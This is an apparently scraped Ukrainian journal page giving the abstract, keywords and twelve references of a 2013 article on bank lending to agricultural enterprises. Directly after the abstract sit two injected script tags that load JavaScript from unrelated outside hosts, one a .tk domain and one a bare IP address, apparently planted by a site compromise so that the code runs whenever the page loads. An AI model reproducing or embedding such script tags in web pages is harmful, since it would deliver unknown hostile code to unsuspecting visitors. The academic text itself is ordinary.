ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 113:303.7011:336.77:631.11
Фінансові відносини та бухгалтерський облік

Трансформація матриці банківського кредитування сільськогосподарських підприємств / Стецюк П.А., Гудзь О.Є., Войтюк А. В. // Економіка АПК. - 2013. - № 12 - С. 49

Розглянуто інструменти, прийоми та методи системи банківського кредитування, які дають змогу ефективно задіяти локальні фінансові механізми. Витоками цього доведено необхідність і можливості трансформації матриці банківського кредитування сільськогосподарських підприємств. Відзначено роль держави в розробці та запровадженні ефективних дій на ринку кредитів. Доведено ефективність цільової програми фінансової підтримки сільськогосподарських підприємств через механізм здешевлення кредитів. Досліджено основні цілі ефективного розвитку банків і виділено пріоритетні напрями розвитку банківського кредитування сільськогосподарських підприємств. Здійснено моніторинг існуючих проблем у контексті реалій викликів та запитів сьогодення й обґрунтовано напрями зміни траєкторії модернізації банківського кредитування сільськогосподарських підприємств. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аналіз, банк, банківське кредитування, іпотечне кредитування, кредитне забезпечення, відсоткові ставки, сільськогосподарські підприємства

Список використаних джерел

 1. Аранчій В.І. Особливості банківського кредитування аграрних товаровиробників в сучасних умовах / В. І. Аранчій // Наук. праці Полтав. держ. аграр. акад. [«Економічні науки»]. – Полтава : ПДАА. – 2011. – Т. 1, Вип. 2. – С. 3–6.
 2. Войтюк А.В. Фінансове забезпечення аграрного сектора економіки України [Електронний ресурс] / А.В. Войтюк. – Режим доступу: http://www.economy.nayka.com.ua/.
 3. Гудзь О.Є. Модернізація банківської кредитної політики при обслуговуванні агроформувань / О.Є. Гудзь // Вісн. Харк. нац. техн. ун-ту сільського господарства: Економічні науки. Вип. 126. – Харків: ХНТУСГ, 2012 р. – С. 10–18.
 4. Дем’яненко М.Я. Оцінка кредитоспроможності агроформувань (теорія та практика) : моногр. / М. Я. Дем’яненко, О. Є. Гудзь, П. А. Стецюк – К. : ННЦ ІАЕ, 2008. – 302 с.
 5. Любар О.О. Особливості формування кредитної політики банків при обслуговуванні суб’єктів аграрної сфери / О. О. Любар // Зб. наук. праць Вінниц. нац. аграр. ун-ту. Серія «Економічні науки». – 2010. – Т. 2. – Вип. 5. – С. 224–230.
 6. Непочатенко О.О. Сучасний стан і перспективи короткострокового банківського кредитування сільськогосподарських підприємств / О. О. Непочатенко, О. В. Яковенко // Зб. наук. праць Уман. держ. аграр. ун-ту; редкол.: А. Ф. Головчук (відп. ред.) та ін. – Умань, 2009. – Вип. 70. – Ч. 2 : Економіка. – С. 130–135.
 7. Стецюк П.А. Методологія та механізми фінансового забезпечення розширеного відтворення аграрного виробництва / П.А. Стецюк // Вісн. Сумського нац. аграр. ун-ту. Серія: Фінанси і кредит. – 2010 – № 2 (29). – С. 16-22.
 8. Стецюк П.А. Проблеми фінансового забезпечення сільськогосподарських підприємств / П.А. Стецюк //Облік і фінанси АПК. – 2011. – №4. – С. 134-137.
 9. Innovation Clusters: Drivers of National Innovation System. – Paris: ОЕСD, 2003. – 235 р.
 10. Lord W.A. Household Dynamics. Economic Growth and Policy Oxford University Press. – 2002 – 378 p.
 11. Methodological aspects of urban evolution comparative studies / Edward K. Trutnev // Eur. Cities. Growth and Decline.: Int. Res. Conf., The Hagus., Apr. 13-16, 1992: Book Abstr. Amsterdam etc., 2002. – 246 p.
 12. World Investment Report 2005. Transnational Corporations and the Internationalization of R&D // www. unctad.org/en/docs/wir2005overview_en. Pdf.
Читати статтю: 13_12_49-55.pdf